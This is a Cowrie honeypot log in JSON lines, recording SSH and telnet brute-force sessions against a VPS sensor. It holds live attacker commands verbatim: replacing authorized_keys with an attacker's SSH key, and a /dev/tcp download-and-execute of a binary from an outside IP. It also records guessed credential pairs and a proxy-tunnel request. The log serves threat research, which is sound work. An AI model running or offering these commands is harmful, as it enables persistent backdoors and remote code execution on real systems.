{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:19:05.618178Z","src_ip":"185.255.91.51","session":"61657082b849"}
{"eventid":"cowrie.login.success","username":"root","password":"1234!@#$qwerQWER","message":"login attempt [root/1234!@#$qwerQWER] succeeded","sensor":"my-vps","timestamp":"2025-09-08T15:19:06.021648Z","src_ip":"185.255.91.51","session":"61657082b849"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T15:19:06.367163Z","src_ip":"185.255.91.51","session":"61657082b849"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T15:19:06.367859Z","src_ip":"185.255.91.51","session":"61657082b849"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T15:19:06.369061Z","src_ip":"185.255.91.51","session":"61657082b849"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:19:06.472410Z","src_ip":"185.255.91.51","session":"61657082b849"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T15:19:06.692042Z","src_ip":"185.255.91.51","session":"61657082b849"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T15:19:06.692794Z","src_ip":"185.255.91.51","session":"61657082b849"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T15:19:06.799198Z","src_ip":"185.255.91.51","session":"61657082b849"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:19:06.800088Z","src_ip":"185.255.91.51","session":"61657082b849"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":38528,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f083a13a57c","protocol":"ssh","message":"New connection: 185.255.91.51:38528 (1.2.3.4:22) [session: 8f083a13a57c]","sensor":"my-vps","timestamp":"2025-09-08T15:19:06.902158Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:19:06.903980Z","src_ip":"185.255.91.51","session":"8f083a13a57c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:19:07.004753Z","src_ip":"185.255.91.51","session":"8f083a13a57c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T15:19:07.409009Z","src_ip":"185.255.91.51","session":"8f083a13a57c"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:19:08.512642Z","src_ip":"185.255.91.51","session":"8f083a13a57c"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":38530,"dst_ip":"1.2.3.4","dst_port":22,"session":"b6c66d386359","protocol":"ssh","message":"New connection: 185.255.91.51:38530 (1.2.3.4:22) [session: b6c66d386359]","sensor":"my-vps","timestamp":"2025-09-08T15:19:08.607095Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:19:08.608252Z","src_ip":"185.255.91.51","session":"b6c66d386359"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:19:08.707626Z","src_ip":"185.255.91.51","session":"b6c66d386359"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T15:19:09.142650Z","src_ip":"185.255.91.51","session":"b6c66d386359"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:19:09.243522Z","src_ip":"185.255.91.51","session":"b6c66d386359"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:19:09.244386Z","src_ip":"185.255.91.51","session":"61657082b849"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":38846,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c9206376524","protocol":"ssh","message":"New connection: 185.255.91.51:38846 (1.2.3.4:22) [session: 0c9206376524]","sensor":"my-vps","timestamp":"2025-09-08T15:20:13.811018Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:20:13.811813Z","src_ip":"185.255.91.51","session":"0c9206376524"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:20:13.902783Z","src_ip":"185.255.91.51","session":"0c9206376524"}
{"eventid":"cowrie.login.failed","username":"webapp","password":"1234567890","message":"login attempt [webapp/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-08T15:20:14.306984Z","src_ip":"185.255.91.51","session":"0c9206376524"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:20:15.402609Z","src_ip":"185.255.91.51","session":"0c9206376524"}
{"eventid":"cowrie.session.connect","src_ip":"185.156.73.235","src_port":64001,"dst_ip":"1.2.3.4","dst_port":22,"session":"28133df6ef96","protocol":"ssh","message":"New connection: 185.156.73.235:64001 (1.2.3.4:22) [session: 28133df6ef96]","sensor":"my-vps","timestamp":"2025-09-08T15:20:29.921593Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:20:29.942124Z","src_ip":"185.156.73.235","session":"28133df6ef96"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":59388,"dst_ip":"1.2.3.4","dst_port":22,"session":"15d52986803b","protocol":"ssh","message":"New connection: 217.72.205.35:59388 (1.2.3.4:22) [session: 15d52986803b]","sensor":"my-vps","timestamp":"2025-09-08T15:22:09.658599Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:22:09.659773Z","src_ip":"217.72.205.35","session":"15d52986803b"}
{"eventid":"cowrie.session.connect","src_ip":"8.138.136.155","src_port":44540,"dst_ip":"1.2.3.4","dst_port":22,"session":"bac37def5627","protocol":"ssh","message":"New connection: 8.138.136.155:44540 (1.2.3.4:22) [session: bac37def5627]","sensor":"my-vps","timestamp":"2025-09-08T15:22:21.585104Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-makiko","message":"Remote SSH version: SSH-2.0-makiko","sensor":"my-vps","timestamp":"2025-09-08T15:22:21.586075Z","src_ip":"8.138.136.155","session":"bac37def5627"}
{"eventid":"cowrie.client.kex","hassh":"2f5ebb184f5d02324eed9a822f5259dc","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,aes192-cbc,aes256-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1-etm@openssh.com,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","rsa-sha2-256","rsa-sha2-512","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-cbc","aes192-cbc","aes256-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1-etm@openssh.com","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2f5ebb184f5d02324eed9a822f5259dc","sensor":"my-vps","timestamp":"2025-09-08T15:22:21.586525Z","src_ip":"8.138.136.155","session":"bac37def5627"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-09-08T15:22:22.185462Z","src_ip":"8.138.136.155","session":"bac37def5627"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-09-08T15:22:23.387452Z","src_ip":"8.138.136.155","session":"bac37def5627"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T15:22:23.832212Z","src_ip":"8.138.136.155","session":"bac37def5627"}
{"eventid":"cowrie.command.input","input":"cat /bin/echo","message":"CMD: cat /bin/echo","sensor":"my-vps","timestamp":"2025-09-08T15:22:23.834894Z","src_ip":"8.138.136.155","session":"bac37def5627"}
{"eventid":"cowrie.command.input","input":"nohup bash -c \"exec 6<>/dev/tcp/8.217.250.82/60148 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/brUzGZ2Wt5 && chmod +x /tmp/brUzGZ2Wt5 && /tmp/brUzGZ2Wt5 5HAZbzbAA4LoD9o42w/ugAjYP2wYZ4WUZhBzPt8LmO0W2C7fGeaAAt87bwhoi5dhH3M92wKY5BPRNtsQ6I4S1iFsG2iLlGMecz7bB4zqEdox2gABAoBg/4wsewnYLzMop5q+EW/dKlGl2M8=\" &","message":"CMD: nohup bash -c \"exec 6<>/dev/tcp/8.217.250.82/60148 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/brUzGZ2Wt5 && chmod +x /tmp/brUzGZ2Wt5 && /tmp/brUzGZ2Wt5 5HAZbzbAA4LoD9o42w/ugAjYP2wYZ4WUZhBzPt8LmO0W2C7fGeaAAt87bwhoi5dhH3M92wKY5BPRNtsQ6I4S1iFsG2iLlGMecz7bB4zqEdox2gABAoBg/4wsewnYLzMop5q+EW/dKlGl2M8=\" &","sensor":"my-vps","timestamp":"2025-09-08T15:22:30.049314Z","src_ip":"8.138.136.155","session":"bac37def5627"}
{"eventid":"cowrie.command.input","input":"head -c 1458464 > /tmp/5nXGaqU8Di","message":"CMD: head -c 1458464 > /tmp/5nXGaqU8Di","sensor":"my-vps","timestamp":"2025-09-08T15:22:30.053316Z","src_ip":"8.138.136.155","session":"bac37def5627"}
{"eventid":"cowrie.command.input","input":"cat /bin/echoQtd#UPX!","message":"CMD: cat /bin/echoQtd#UPX!","sensor":"my-vps","timestamp":"2025-09-08T15:22:30.261454Z","src_ip":"8.138.136.155","session":"bac37def5627"}
{"eventid":"cowrie.command.input","input":">yoA@/;'8ELFP;i2","message":"CMD: >yoA@/;'8ELFP;i2","sensor":"my-vps","timestamp":"2025-09-08T15:22:30.266963Z","src_ip":"8.138.136.155","session":"bac37def5627"}
{"eventid":"cowrie.command.input","input":"","message":"CMD: ","sensor":"my-vps","timestamp":"2025-09-08T15:22:30.270983Z","src_ip":"8.138.136.155","session":"bac37def5627"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/9382fb1dffe96c7268eaa74cc027e7a76a6f78f11c1d981a9d2a7820c4f4ae4e","size":1968,"shasum":"9382fb1dffe96c7268eaa74cc027e7a76a6f78f11c1d981a9d2a7820c4f4ae4e","duplicate":false,"duration":"6.4","message":"Closing TTY Log: var/lib/cowrie/tty/9382fb1dffe96c7268eaa74cc027e7a76a6f78f11c1d981a9d2a7820c4f4ae4e after 6.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:22:30.272582Z","src_ip":"8.138.136.155","session":"bac37def5627"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:22:30.274133Z","src_ip":"8.138.136.155","session":"bac37def5627"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":25682,"dst_ip":"1.2.3.4","dst_port":22,"session":"6211336b4bc1","protocol":"ssh","message":"New connection: 212.227.125.160:25682 (1.2.3.4:22) [session: 6211336b4bc1]","sensor":"my-vps","timestamp":"2025-09-08T15:27:01.253347Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:27:01.254413Z","src_ip":"212.227.125.160","session":"6211336b4bc1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":25933,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c3e20575c9c","protocol":"ssh","message":"New connection: 212.227.125.160:25933 (1.2.3.4:22) [session: 6c3e20575c9c]","sensor":"my-vps","timestamp":"2025-09-08T15:27:01.369655Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T15:27:01.370899Z","src_ip":"212.227.125.160","session":"6c3e20575c9c"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-08T15:27:01.486465Z","src_ip":"212.227.125.160","session":"6c3e20575c9c"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-08T15:27:01.835111Z","src_ip":"212.227.125.160","session":"6c3e20575c9c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-08T15:27:01.951952Z","session":"6c3e20575c9c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":3796,"dst_ip":"1.2.3.4","dst_port":23,"session":"96e947f508f9","protocol":"telnet","message":"New connection: 212.227.235.229:3796 (1.2.3.4:23) [session: 96e947f508f9]","sensor":"my-vps","timestamp":"2025-09-08T15:27:07.835686Z"}
{"eventid":"cowrie.session.closed","duration":13.56946849822998,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:27:21.405084Z","src_ip":"212.227.235.229","session":"96e947f508f9"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:28:11.368983Z","src_ip":"212.227.125.160","session":"6c3e20575c9c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":5724,"dst_ip":"1.2.3.4","dst_port":23,"session":"7c1c1a82a105","protocol":"telnet","message":"New connection: 212.227.125.160:5724 (1.2.3.4:23) [session: 7c1c1a82a105]","sensor":"my-vps","timestamp":"2025-09-08T15:28:48.612339Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-09-08T15:28:49.308486Z","src_ip":"212.227.125.160","session":"7c1c1a82a105"}
{"eventid":"cowrie.session.closed","duration":1.0880625247955322,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:28:49.700312Z","src_ip":"212.227.125.160","session":"7c1c1a82a105"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":51432,"dst_ip":"1.2.3.4","dst_port":22,"session":"b4b49b32bf34","protocol":"ssh","message":"New connection: 217.72.205.35:51432 (1.2.3.4:22) [session: b4b49b32bf34]","sensor":"my-vps","timestamp":"2025-09-08T15:28:49.740596Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:28:49.741590Z","src_ip":"217.72.205.35","session":"b4b49b32bf34"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":5746,"dst_ip":"1.2.3.4","dst_port":23,"session":"911942f32d03","protocol":"telnet","message":"New connection: 212.227.125.160:5746 (1.2.3.4:23) [session: 911942f32d03]","sensor":"my-vps","timestamp":"2025-09-08T15:28:51.591651Z"}
{"eventid":"cowrie.login.failed","username":"","password":"root","message":"login attempt [/root] failed","sensor":"my-vps","timestamp":"2025-09-08T15:28:51.914520Z","src_ip":"212.227.125.160","session":"911942f32d03"}
{"eventid":"cowrie.session.closed","duration":0.7085554599761963,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:28:52.300112Z","src_ip":"212.227.125.160","session":"911942f32d03"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":5780,"dst_ip":"1.2.3.4","dst_port":23,"session":"6942a3926bdd","protocol":"telnet","message":"New connection: 212.227.125.160:5780 (1.2.3.4:23) [session: 6942a3926bdd]","sensor":"my-vps","timestamp":"2025-09-08T15:28:53.591533Z"}
{"eventid":"cowrie.login.success","username":"root","password":"1234","message":"login attempt [root/1234] succeeded","sensor":"my-vps","timestamp":"2025-09-08T15:28:54.390547Z","src_ip":"212.227.125.160","session":"6942a3926bdd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T15:28:54.406424Z","src_ip":"212.227.125.160","session":"6942a3926bdd"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-09-08T15:28:54.707923Z","src_ip":"212.227.125.160","session":"6942a3926bdd"}
